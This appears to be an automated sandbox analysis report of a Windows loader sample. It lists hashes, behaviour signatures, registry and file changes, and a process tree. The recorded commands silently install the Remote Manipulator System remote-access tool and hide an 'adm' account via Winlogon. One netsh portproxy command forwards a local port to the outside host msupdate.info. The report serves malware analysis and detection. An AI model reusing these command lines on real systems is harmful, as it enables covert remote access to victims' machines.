Resubmissions
submitted         id                 score
29-12-2021 11:50  211229-nz3vsaddbl  8
29-12-2021 11:29  211229-nlssnaddak  10
28-12-2021 17:00  211228-vh1sescfan  10
Analysis
max time kernel: 98s
max time network: 100s
platform: windows7_x64
resource: win7-en-20211208
submitted: 29-12-2021 11:29
Static task: static1
Behavioral task: behavioral1
Sample: tmp/fca2ee24-3777-4893-aa3c-94407208a71a_$77_loader.exe
Resource: win7-en-20211208
General
Target: tmp/fca2ee24-3777-4893-aa3c-94407208a71a_$77_loader.exe
Size: 397KB
MD5: aff57ee1a4f3731c2036046910f78fb4
SHA1: ef9627c0cadff85a3dfaab6aef0b7c885f03b186
SHA256: 3826953ded758361f9783d67242e4ba87092d637d72bcf81c649e52665c57de4
SHA512: 5ae93c6dae61782a7ac2fa2079df7006e0655d73e32fd7df1a5c1d44e47fd7dd2da225ea6f93e9d3dcb09be5f84b5dab2130bb4f2d5b0e05d95e866ebde0163f
Malware Config
Signatures
Blocklisted process makes network request 3 IoCs
flow  pid   Process
21    1496  msiexec.exe
23    1496  msiexec.exe
25    1496  msiexec.exe
Downloads MZ/PE file
Executes dropped EXE 8 IoCs
pid   Process
1000  RMS.exe
1572  installer.exe
2020  rutserv.exe
1820  rutserv.exe
1584  rutserv.exe
868   rutserv.exe
1044  rfusclient.exe
1852  rfusclient.exe
Sets file execution options in registry 2 TTPs
Loads dropped DLL 4 IoCs
pid   Process
1000  RMS.exe
788   MsiExec.exe
868   rutserv.exe
868   rutserv.exe
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
Enumerates connected drives 3 TTPs 24 IoCs
Attempts to read the root path of hard drives other than the default C: drive.
description              ioc     Process
File opened (read-only)  \??\R:  msiexec.exe
File opened (read-only)  \??\G:  msiexec.exe
File opened (read-only)  \??\H:  msiexec.exe
File opened (read-only)  \??\I:  msiexec.exe
File opened (read-only)  \??\J:  msiexec.exe
File opened (read-only)  \??\K:  msiexec.exe
File opened (read-only)  \??\L:  msiexec.exe
File opened (read-only)  \??\O:  msiexec.exe
File opened (read-only)  \??\Z:  msiexec.exe
File opened (read-only)  \??\V:  msiexec.exe
File opened (read-only)  \??\A:  msiexec.exe
File opened (read-only)  \??\E:  msiexec.exe
File opened (read-only)  \??\F:  msiexec.exe
File opened (read-only)  \??\P:  msiexec.exe
File opened (read-only)  \??\Q:  msiexec.exe
File opened (read-only)  \??\T:  msiexec.exe
File opened (read-only)  \??\U:  msiexec.exe
File opened (read-only)  \??\W:  msiexec.exe
File opened (read-only)  \??\M:  msiexec.exe
File opened (read-only)  \??\S:  msiexec.exe
File opened (read-only)  \??\X:  msiexec.exe
File opened (read-only)  \??\Y:  msiexec.exe
File opened (read-only)  \??\B:  msiexec.exe
File opened (read-only)  \??\N:  msiexec.exe
Modifies WinLogon 2 TTPs 3 IoCs
description      ioc  Process
Key created      \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList  fca2ee24-3777-4893-aa3c-94407208a71a_$77_loader.exe
Key created      \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts  fca2ee24-3777-4893-aa3c-94407208a71a_$77_loader.exe
Set value (int)  \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList\adm = "0"  fca2ee24-3777-4893-aa3c-94407208a71a_$77_loader.exe
Modifies powershell logging option 1 TTPs
Drops file in Program Files directory 53 IoCs
description   ioc  Process
File created  C:\Program Files (x86)\Remote Manipulator System - Host\Printer\x64\unidrv_rms.dll  msiexec.exe
File created  C:\Program Files (x86)\Remote Manipulator System - Host\Printer\x86\rms.ini  msiexec.exe
File created  C:\Program Files (x86)\Remote Manipulator System - Host\Printer\x86\SampleClient.exe  msiexec.exe
File created  C:\Program Files (x86)\Remote Manipulator System - Host\Printer\x86\install.cmd  msiexec.exe
File created  C:\Program Files (x86)\Remote Manipulator System - Host\Printer\x86\rms.gpd  msiexec.exe
File created  C:\Program Files (x86)\Remote Manipulator System - Host\Printer\x64\VPDAgent_x64.exe  msiexec.exe
File created  C:\Program Files (x86)\Remote Manipulator System - Host\Printer\x64\uninstall.cmd  msiexec.exe
File created  C:\Program Files (x86)\Remote Manipulator System - Host\Printer\x86\unidrvui_rms.dll  msiexec.exe
File created  C:\Program Files (x86)\Remote Manipulator System - Host\Printer\x64\unidrv_rms.hlp  msiexec.exe
File created  C:\Program Files (x86)\Remote Manipulator System - Host\RWLN.dll  msiexec.exe
File created  C:\Program Files (x86)\Remote Manipulator System - Host\Printer\x86\ntprint.inf  msiexec.exe
File created  C:\Program Files (x86)\Remote Manipulator System - Host\webmvorbisdecoder.dll  msiexec.exe
File created  C:\Program Files (x86)\Remote Manipulator System - Host\webmmux.dll  msiexec.exe
File created  C:\Program Files (x86)\Remote Manipulator System - Host\Printer\x64\rms.lng  msiexec.exe
File created  C:\Program Files (x86)\Remote Manipulator System - Host\Printer\x86\uninstall.cmd  msiexec.exe
File created  C:\Program Files (x86)\Remote Manipulator System - Host\vp8decoder.dll  msiexec.exe
File created  C:\Program Files (x86)\Remote Manipulator System - Host\rutserv.exe  msiexec.exe
File created  C:\Program Files (x86)\Remote Manipulator System - Host\Russian.lg  msiexec.exe
File created  C:\Program Files (x86)\Remote Manipulator System - Host\Printer\x86\rmsui.dll  msiexec.exe
File created  C:\Program Files (x86)\Remote Manipulator System - Host\Printer\x86\stdnames_vpd.gpd  msiexec.exe
File created  C:\Program Files (x86)\Remote Manipulator System - Host\Printer\x64\rmspm.dll  msiexec.exe
File created  C:\Program Files (x86)\Remote Manipulator System - Host\Printer\x64\rms.gpd  msiexec.exe
File created  C:\Program Files (x86)\Remote Manipulator System - Host\Printer\x64\rmsui.dll  msiexec.exe
File created  C:\Program Files (x86)\Remote Manipulator System - Host\English.lg  msiexec.exe
File created  C:\Program Files (x86)\Remote Manipulator System - Host\rfusclient.exe  msiexec.exe
File created  C:\Program Files (x86)\Remote Manipulator System - Host\Printer\x86\unidrv_rms.dll  msiexec.exe
File created  C:\Program Files (x86)\Remote Manipulator System - Host\Printer\x64\progress.exe  msiexec.exe
File created  C:\Program Files (x86)\Remote Manipulator System - Host\Printer\x64\rms_s.lng  msiexec.exe
File created  C:\Program Files (x86)\Remote Manipulator System - Host\webmvorbisencoder.dll  msiexec.exe
File created  C:\Program Files (x86)\Remote Manipulator System - Host\Printer\x64\fwproc.exe  msiexec.exe
File created  C:\Program Files (x86)\Remote Manipulator System - Host\Printer\x64\rmsui2.exe  msiexec.exe
File created  C:\Program Files (x86)\Remote Manipulator System - Host\Printer\x64\setupdrv.exe  msiexec.exe
File created  C:\Program Files (x86)\Remote Manipulator System - Host\Printer\x86\rms.lng  msiexec.exe
File created  C:\Program Files (x86)\Remote Manipulator System - Host\Printer\x86\rms_s.lng  msiexec.exe
File created  C:\Program Files (x86)\Remote Manipulator System - Host\Printer\x86\rmspm.dll  msiexec.exe
File created  C:\Program Files (x86)\Remote Manipulator System - Host\Printer\x86\unires_vpd.dll  msiexec.exe
File created  C:\Program Files (x86)\Remote Manipulator System - Host\Printer\x64\rms.ini  msiexec.exe
File created  C:\Program Files (x86)\Remote Manipulator System - Host\EULA.rtf  msiexec.exe
File created  C:\Program Files (x86)\Remote Manipulator System - Host\RIPCServer.dll  msiexec.exe
File created  C:\Program Files (x86)\Remote Manipulator System - Host\Printer\x86\setupdrv.exe  msiexec.exe
File created  C:\Program Files (x86)\Remote Manipulator System - Host\Printer\x86\srvinst.exe  msiexec.exe
File created  C:\Program Files (x86)\Remote Manipulator System - Host\Printer\x86\VPDAgent.exe  msiexec.exe
File created  C:\Program Files (x86)\Remote Manipulator System - Host\Printer\x64\unidrvui_rms.dll  msiexec.exe
File created  C:\Program Files (x86)\Remote Manipulator System - Host\Printer\x64\unires_vpd.dll  msiexec.exe
File created  C:\Program Files (x86)\Remote Manipulator System - Host\Printer\x64\install.cmd  msiexec.exe
File created  C:\Program Files (x86)\Remote Manipulator System - Host\Printer\x64\stdnames_vpd.gpd  msiexec.exe
File created  C:\Program Files (x86)\Remote Manipulator System - Host\Printer\x86\rmsui2.exe  msiexec.exe
File created  C:\Program Files (x86)\Remote Manipulator System - Host\Printer\x86\unidrv_rms.hlp  msiexec.exe
File created  C:\Program Files (x86)\Remote Manipulator System - Host\Printer\x64\srvinst_x64.exe  msiexec.exe
File created  C:\Program Files (x86)\Remote Manipulator System - Host\Printer\x86\fwproc.exe  msiexec.exe
File created  C:\Program Files (x86)\Remote Manipulator System - Host\Printer\x86\progress.exe  msiexec.exe
File created  C:\Program Files (x86)\Remote Manipulator System - Host\vp8encoder.dll  msiexec.exe
File created  C:\Program Files (x86)\Remote Manipulator System - Host\Printer\x64\ntprint.inf  msiexec.exe
Drops file in Windows directory 20 IoCs
description                   ioc  Process
File opened for modification  C:\Windows\Installer\{D9E14363-FD66-419D-9DC9-C62471755C9F}\UNINST_Uninstall_R_3B1E3C8B7D0945898DA82CEEED02F0C7.exe  msiexec.exe
File opened for modification  C:\Windows\Installer\{D9E14363-FD66-419D-9DC9-C62471755C9F}\server_config_C8E9A92497A149D695F92E4E3AE550F0.exe  msiexec.exe
File created                  C:\Windows\SoftwareDistribution\config.xml  fca2ee24-3777-4893-aa3c-94407208a71a_$77_loader.exe
File created                  C:\Windows\Installer\f76bf69.msi  msiexec.exe
File created                  C:\Windows\Installer\f76bf6b.ipi  msiexec.exe
File opened for modification  C:\Windows\Installer\  msiexec.exe
File opened for modification  C:\Windows\Installer\{D9E14363-FD66-419D-9DC9-C62471755C9F}\ARPPRODUCTICON.exe  msiexec.exe
File created                  C:\Windows\Installer\f76bf6d.msi  msiexec.exe
File created                  C:\Windows\Installer\{D9E14363-FD66-419D-9DC9-C62471755C9F}\UNINST_Uninstall_R_3B1E3C8B7D0945898DA82CEEED02F0C7.exe  msiexec.exe
File created                  C:\Windows\Installer\{D9E14363-FD66-419D-9DC9-C62471755C9F}\server_config_C8E9A92497A149D695F92E4E3AE550F0.exe  msiexec.exe
File opened for modification  C:\Windows\Installer\f76bf6b.ipi  msiexec.exe
File created                  C:\Windows\Installer\{D9E14363-FD66-419D-9DC9-C62471755C9F}\server_start_C00864331B9D4391A8A26292A601EBE2.exe  msiexec.exe
File opened for modification  C:\Windows\Installer\{D9E14363-FD66-419D-9DC9-C62471755C9F}\server_start_C00864331B9D4391A8A26292A601EBE2.exe  msiexec.exe
File opened for modification  C:\Windows\Installer\f76bf69.msi  msiexec.exe
File opened for modification  C:\Windows\Installer\MSIC3A7.tmp  msiexec.exe
File opened for modification  C:\Windows\Installer\MSIC637.tmp  msiexec.exe
File created                  C:\Windows\Installer\{D9E14363-FD66-419D-9DC9-C62471755C9F}\ARPPRODUCTICON.exe  msiexec.exe
File created                  C:\Windows\Installer\{D9E14363-FD66-419D-9DC9-C62471755C9F}\server_stop_27D7873393984316BEA10FB36BB4D2F9.exe  msiexec.exe
File opened for modification  C:\Windows\SoftwareDistribution\config.xml  fca2ee24-3777-4893-aa3c-94407208a71a_$77_loader.exe
File opened for modification  C:\Windows\Installer\{D9E14363-FD66-419D-9DC9-C62471755C9F}\server_stop_27D7873393984316BEA10FB36BB4D2F9.exe  msiexec.exe
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
Gathers network information 2 TTPs 6 IoCs
Uses commandline utility to view network configuration.
pid   Process
892   NETSTAT.EXE
1528  NETSTAT.EXE
560   NETSTAT.EXE
656   NETSTAT.EXE
1380  NETSTAT.EXE
1620  NETSTAT.EXE
Modifies data under HKEY_USERS 3 IoCs
description  ioc  Process
Key created  \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\26  msiexec.exe
Key deleted  \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\25\52C64B7E  msiexec.exe
Key deleted  \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\25  msiexec.exe
Modifies registry class 24 IoCs
description       ioc  Process
Set value (int)   \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\36341E9D66DFD914D99C6C421757C5F9\AdvertiseFlags = "388"  msiexec.exe
Set value (int)   \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\36341E9D66DFD914D99C6C421757C5F9\InstanceType = "0"  msiexec.exe
Set value (str)   \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\36341E9D66DFD914D99C6C421757C5F9\SourceList\LastUsedSource = "n;1;C:\\Users\\Admin\\AppData\\Local\\Temp\\7ZipSfx.000\\"  msiexec.exe
Key created       \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Features\36341E9D66DFD914D99C6C421757C5F9  msiexec.exe
Key created       \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\36341E9D66DFD914D99C6C421757C5F9  msiexec.exe
Set value (int)   \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\36341E9D66DFD914D99C6C421757C5F9\Assignment = "1"  msiexec.exe
Set value (str)   \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\36341E9D66DFD914D99C6C421757C5F9\ProductIcon = "C:\\Windows\\Installer\\{D9E14363-FD66-419D-9DC9-C62471755C9F}\\ARPPRODUCTICON.exe"  msiexec.exe
Key created       \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\UpgradeCodes\509B38EF4554FFD4794F292971C81B17  msiexec.exe
Set value (str)   \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\36341E9D66DFD914D99C6C421757C5F9\SourceList\PackageName = "rms.host6.3ru_mod.msi"  msiexec.exe
Set value (str)   \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\36341E9D66DFD914D99C6C421757C5F9\SourceList\Media\DiskPrompt = "[1]"  msiexec.exe
Set value (str)   \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\36341E9D66DFD914D99C6C421757C5F9\ProductName = "Remote Manipulator System - Host"  msiexec.exe
Set value (int)   \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\36341E9D66DFD914D99C6C421757C5F9\Language = "1049"  msiexec.exe
Set value (int)   \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\36341E9D66DFD914D99C6C421757C5F9\Version = "115998720"  msiexec.exe
Key created       \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\36341E9D66DFD914D99C6C421757C5F9\SourceList\Net  msiexec.exe
Set value (str)   \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\36341E9D66DFD914D99C6C421757C5F9\SourceList\Media\1 = "DISK1;1"  msiexec.exe
Set value (data)  \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\36341E9D66DFD914D99C6C421757C5F9\Clients = 3a0000000000  msiexec.exe
Set value (str)   \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Features\36341E9D66DFD914D99C6C421757C5F9\RMS  msiexec.exe
Set value (str)   \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\36341E9D66DFD914D99C6C421757C5F9\PackageCode = "EE22CCA5812A64F4CB23B29D2A4A798E"  msiexec.exe
Set value (str)   \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\UpgradeCodes\509B38EF4554FFD4794F292971C81B17\36341E9D66DFD914D99C6C421757C5F9  msiexec.exe
Set value (str)   \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\36341E9D66DFD914D99C6C421757C5F9\SourceList\Net\1 = "C:\\Users\\Admin\\AppData\\Local\\Temp\\7ZipSfx.000\\"  msiexec.exe
Key created       \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\36341E9D66DFD914D99C6C421757C5F9\SourceList\Media  msiexec.exe
Set value (int)   \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\36341E9D66DFD914D99C6C421757C5F9\AuthorizedLUAApp = "0"  msiexec.exe
Set value (int)   \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\36341E9D66DFD914D99C6C421757C5F9\DeploymentFlags = "3"  msiexec.exe
Key created       \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\36341E9D66DFD914D99C6C421757C5F9\SourceList  msiexec.exe
Suspicious behavior: EnumeratesProcesses 27 IoCs
(identical consecutive rows collapsed; count gives the number of occurrences)
pid   Process                                               count
856   fca2ee24-3777-4893-aa3c-94407208a71a_$77_loader.exe   7
1572  installer.exe                                         6
1496  msiexec.exe                                           2
2020  rutserv.exe                                           4
1820  rutserv.exe                                           2
1584  rutserv.exe                                           2
868   rutserv.exe                                           4
Suspicious use of AdjustPrivilegeToken 64 IoCs
description                             pid   Process
Token: SeDebugPrivilege                 856   fca2ee24-3777-4893-aa3c-94407208a71a_$77_loader.exe
Token: SeRestorePrivilege               1968  msiexec.exe
Token: SeTakeOwnershipPrivilege         1968  msiexec.exe
Token: SeSecurityPrivilege              1968  msiexec.exe
Token: SeDebugPrivilege                 656   NETSTAT.EXE
Token: SeDebugPrivilege                 1380  NETSTAT.EXE
Token: SeDebugPrivilege                 1620  NETSTAT.EXE
Token: SeDebugPrivilege                 892   NETSTAT.EXE
Token: SeDebugPrivilege                 1528  NETSTAT.EXE
Token: SeDebugPrivilege                 560   NETSTAT.EXE
Token: SeShutdownPrivilege              544   msiexec.exe
Token: SeIncreaseQuotaPrivilege         544   msiexec.exe
Token: SeRestorePrivilege               1496  msiexec.exe
Token: SeTakeOwnershipPrivilege         1496  msiexec.exe
Token: SeSecurityPrivilege              1496  msiexec.exe
Token: SeCreateTokenPrivilege           544   msiexec.exe
Token: SeAssignPrimaryTokenPrivilege    544   msiexec.exe
Token: SeLockMemoryPrivilege            544   msiexec.exe
Token: SeIncreaseQuotaPrivilege         544   msiexec.exe
Token: SeMachineAccountPrivilege        544   msiexec.exe
Token: SeTcbPrivilege                   544   msiexec.exe
Token: SeSecurityPrivilege              544   msiexec.exe
Token: SeTakeOwnershipPrivilege         544   msiexec.exe
Token: SeLoadDriverPrivilege            544   msiexec.exe
Token: SeSystemProfilePrivilege         544   msiexec.exe
Token: SeSystemtimePrivilege            544   msiexec.exe
Token: SeProfSingleProcessPrivilege     544   msiexec.exe
Token: SeIncBasePriorityPrivilege       544   msiexec.exe
Token: SeCreatePagefilePrivilege        544   msiexec.exe
Token: SeCreatePermanentPrivilege       544   msiexec.exe
Token: SeBackupPrivilege                544   msiexec.exe
Token: SeRestorePrivilege               544   msiexec.exe
Token: SeShutdownPrivilege              544   msiexec.exe
Token: SeDebugPrivilege                 544   msiexec.exe
Token: SeAuditPrivilege                 544   msiexec.exe
Token: SeSystemEnvironmentPrivilege     544   msiexec.exe
Token: SeChangeNotifyPrivilege          544   msiexec.exe
Token: SeRemoteShutdownPrivilege        544   msiexec.exe
Token: SeUndockPrivilege                544   msiexec.exe
Token: SeSyncAgentPrivilege             544   msiexec.exe
Token: SeEnableDelegationPrivilege      544   msiexec.exe
Token: SeManageVolumePrivilege          544   msiexec.exe
Token: SeImpersonatePrivilege           544   msiexec.exe
Token: SeCreateGlobalPrivilege          544   msiexec.exe
Token: SeRestorePrivilege               1496  msiexec.exe
Token: SeTakeOwnershipPrivilege         1496  msiexec.exe
Token: SeRestorePrivilege               1496  msiexec.exe
Token: SeTakeOwnershipPrivilege         1496  msiexec.exe
Token: SeRestorePrivilege               1496  msiexec.exe
Token: SeTakeOwnershipPrivilege         1496  msiexec.exe
Token: SeRestorePrivilege               1496  msiexec.exe
Token: SeTakeOwnershipPrivilege         1496  msiexec.exe
Token: SeRestorePrivilege               1496  msiexec.exe
Token: SeTakeOwnershipPrivilege         1496  msiexec.exe
Token: SeRestorePrivilege               1496  msiexec.exe
Token: SeTakeOwnershipPrivilege         1496  msiexec.exe
Token: SeRestorePrivilege               1496  msiexec.exe
Token: SeTakeOwnershipPrivilege         1496  msiexec.exe
Token: SeRestorePrivilege               1496  msiexec.exe
Token: SeTakeOwnershipPrivilege         1496  msiexec.exe
Token: SeRestorePrivilege               1496  msiexec.exe
Token: SeTakeOwnershipPrivilege         1496  msiexec.exe
Token: SeRestorePrivilege               1496  msiexec.exe
Token: SeTakeOwnershipPrivilege         1496  msiexec.exe
Suspicious use of SetWindowsHookEx 5 IoCs
pid   Process
1572  installer.exe
2020  rutserv.exe
1820  rutserv.exe
1584  rutserv.exe
868   rutserv.exe
Suspicious use of WriteProcessMemory 64 IoCs
(identical consecutive rows collapsed; count gives the number of occurrences)
description                          pid   Process                                               procid_target  count
PID 856 wrote to memory of 656       856   fca2ee24-3777-4893-aa3c-94407208a71a_$77_loader.exe   27             3
PID 656 wrote to memory of 1252      656   csc.exe                                               29             3
PID 856 wrote to memory of 1372      856   fca2ee24-3777-4893-aa3c-94407208a71a_$77_loader.exe   31             3
PID 856 wrote to memory of 792       856   fca2ee24-3777-4893-aa3c-94407208a71a_$77_loader.exe   34             3
PID 856 wrote to memory of 656       856   fca2ee24-3777-4893-aa3c-94407208a71a_$77_loader.exe   35             3
PID 856 wrote to memory of 1380      856   fca2ee24-3777-4893-aa3c-94407208a71a_$77_loader.exe   36             3
PID 856 wrote to memory of 1620      856   fca2ee24-3777-4893-aa3c-94407208a71a_$77_loader.exe   37             3
PID 856 wrote to memory of 1592      856   fca2ee24-3777-4893-aa3c-94407208a71a_$77_loader.exe   38             3
PID 856 wrote to memory of 1624      856   fca2ee24-3777-4893-aa3c-94407208a71a_$77_loader.exe   39             3
PID 856 wrote to memory of 1780      856   fca2ee24-3777-4893-aa3c-94407208a71a_$77_loader.exe   40             3
PID 856 wrote to memory of 1300      856   fca2ee24-3777-4893-aa3c-94407208a71a_$77_loader.exe   41             3
PID 856 wrote to memory of 1904      856   fca2ee24-3777-4893-aa3c-94407208a71a_$77_loader.exe   42             3
PID 856 wrote to memory of 892       856   fca2ee24-3777-4893-aa3c-94407208a71a_$77_loader.exe   43             3
PID 856 wrote to memory of 1528      856   fca2ee24-3777-4893-aa3c-94407208a71a_$77_loader.exe   44             3
PID 856 wrote to memory of 560       856   fca2ee24-3777-4893-aa3c-94407208a71a_$77_loader.exe   45             3
PID 856 wrote to memory of 1000      856   fca2ee24-3777-4893-aa3c-94407208a71a_$77_loader.exe   47             4
PID 1000 wrote to memory of 1572     1000  RMS.exe                                               48             7
PID 1572 wrote to memory of 544      1572  installer.exe                                         49             7
PID 1496 wrote to memory of 788      1496  msiexec.exe                                           51             1
Processes
(tree; indentation shows the parent/child relationship, PID as reported)

C:\Users\Admin\AppData\Local\Temp\tmp\fca2ee24-3777-4893-aa3c-94407208a71a_$77_loader.exe
  Command line: "C:\Users\Admin\AppData\Local\Temp\tmp\fca2ee24-3777-4893-aa3c-94407208a71a_$77_loader.exe"
  - Modifies WinLogon
  - Drops file in Windows directory
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID: 856

    C:\Windows\Microsoft.NET\Framework64\v2.0.50727\csc.exe
      Command line: "C:\Windows\Microsoft.NET\Framework64\v2.0.50727\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\8f94smgx.cmdline"
      - Suspicious use of WriteProcessMemory
      PID: 656

        C:\Windows\Microsoft.NET\Framework64\v2.0.50727\cvtres.exe
          Command line: C:\Windows\Microsoft.NET\Framework64\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESD450.tmp" "c:\Users\Admin\AppData\Local\Temp\CSCD440.tmp"
          PID: 1252

    C:\Windows\system32\chcp.com
      Command line: "C:\Windows\system32\chcp.com" 437
      PID: 1372

    C:\Windows\system32\netsh.exe
      Command line: "C:\Windows\system32\netsh.exe" interface portproxy show all
      PID: 792

    C:\Windows\system32\NETSTAT.EXE
      Command line: "C:\Windows\system32\NETSTAT.EXE" -na
      - Gathers network information
      - Suspicious use of AdjustPrivilegeToken
      PID: 656

    C:\Windows\system32\NETSTAT.EXE
      Command line: "C:\Windows\system32\NETSTAT.EXE" -na
      - Gathers network information
      - Suspicious use of AdjustPrivilegeToken
      PID: 1380

    C:\Windows\system32\NETSTAT.EXE
      Command line: "C:\Windows\system32\NETSTAT.EXE" -na
      - Gathers network information
      - Suspicious use of AdjustPrivilegeToken
      PID: 1620

    C:\Windows\system32\netsh.exe
      Command line: "C:\Windows\system32\netsh.exe" interface portproxy reset
      PID: 1592

    C:\Windows\system32\netsh.exe
      Command line: "C:\Windows\system32\netsh.exe" interface portproxy show all
      PID: 1624

    C:\Windows\system32\netsh.exe
      Command line: "C:\Windows\system32\netsh.exe" interface portproxy add v4tov4 listenport=757 connectport=443 connectaddress=msupdate.info
      PID: 1780

    C:\Windows\system32\netsh.exe
      Command line: "C:\Windows\system32\netsh.exe" interface portproxy show all
      PID: 1300

    C:\Windows\system32\netsh.exe
      Command line: "C:\Windows\system32\netsh.exe" interface portproxy show all
      PID: 1904

    C:\Windows\system32\NETSTAT.EXE
      Command line: "C:\Windows\system32\NETSTAT.EXE" -na
      - Gathers network information
      - Suspicious use of AdjustPrivilegeToken
      PID: 892

    C:\Windows\system32\NETSTAT.EXE
      Command line: "C:\Windows\system32\NETSTAT.EXE" -na
      - Gathers network information
      - Suspicious use of AdjustPrivilegeToken
      PID: 1528

    C:\Windows\system32\NETSTAT.EXE
      Command line: "C:\Windows\system32\NETSTAT.EXE" -na
      - Gathers network information
      - Suspicious use of AdjustPrivilegeToken
      PID: 560

    C:\Users\Admin\AppData\Local\Temp\tmp\RMS.exe
      Command line: "C:\Users\Admin\AppData\Local\Temp\tmp\RMS.exe"
      - Executes dropped EXE
      - Loads dropped DLL
      - Suspicious use of WriteProcessMemory
      PID: 1000

        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\installer.exe
          Command line: "C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\installer.exe" /rsetup
          - Executes dropped EXE
          - Suspicious behavior: EnumeratesProcesses
          - Suspicious use of SetWindowsHookEx
          - Suspicious use of WriteProcessMemory
          PID: 1572

            C:\Windows\SysWOW64\msiexec.exe
              Command line: "C:\Windows\System32\msiexec.exe" /i "C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\rms.host6.3ru_mod.msi" /qn
              - Suspicious use of AdjustPrivilegeToken
              PID: 544

            C:\Windows\SysWOW64\cmd.exe
              Command line: cmd /c C:\Users\Admin\AppData\Local\Temp\killself.bat
              PID: 1500

C:\Windows\system32\msiexec.exe
  Command line: C:\Windows\system32\msiexec.exe /V
  - Suspicious use of AdjustPrivilegeToken
  PID: 1968

C:\Windows\system32\msiexec.exe
  Command line: C:\Windows\system32\msiexec.exe /V
  - Blocklisted process makes network request
  - Enumerates connected drives
  - Drops file in Program Files directory
  - Drops file in Windows directory
  - Modifies data under HKEY_USERS
  - Modifies registry class
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID: 1496

    C:\Windows\syswow64\MsiExec.exe
      Command line: C:\Windows\syswow64\MsiExec.exe -Embedding A73C8E42006320536EDD5E741232C0A3
      - Loads dropped DLL
      PID: 788

    C:\Program Files (x86)\Remote Manipulator System - Host\rutserv.exe
      Command line: "C:\Program Files (x86)\Remote Manipulator System - Host\rutserv.exe" /silentinstall
      - Executes dropped EXE
      - Suspicious behavior: EnumeratesProcesses
      - Suspicious use of SetWindowsHookEx
      PID: 2020

    C:\Program Files (x86)\Remote Manipulator System - Host\rutserv.exe
      Command line: "C:\Program Files (x86)\Remote Manipulator System - Host\rutserv.exe" /firewall
      - Executes dropped EXE
      - Suspicious behavior: EnumeratesProcesses
      - Suspicious use of SetWindowsHookEx
      PID: 1820

    C:\Program Files (x86)\Remote Manipulator System - Host\rutserv.exe
      Command line: "C:\Program Files (x86)\Remote Manipulator System - Host\rutserv.exe" /start
      - Executes dropped EXE
      - Suspicious behavior: EnumeratesProcesses
      - Suspicious use of SetWindowsHookEx
      PID: 1584

C:\Program Files (x86)\Remote Manipulator System - Host\rutserv.exe
  Command line: "C:\Program Files (x86)\Remote Manipulator System - Host\rutserv.exe"
  - Executes dropped EXE
  - Loads dropped DLL
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of SetWindowsHookEx
  PID: 868

    C:\Program Files (x86)\Remote Manipulator System - Host\rfusclient.exe
      Command line: "C:\Program Files (x86)\Remote Manipulator System - Host\rfusclient.exe"
      - Executes dropped EXE
      PID: 1044

    C:\Program Files (x86)\Remote Manipulator System - Host\rfusclient.exe
      Command line: "C:\Program Files (x86)\Remote Manipulator System - Host\rfusclient.exe" /tray
      - Executes dropped EXE
      PID: 1852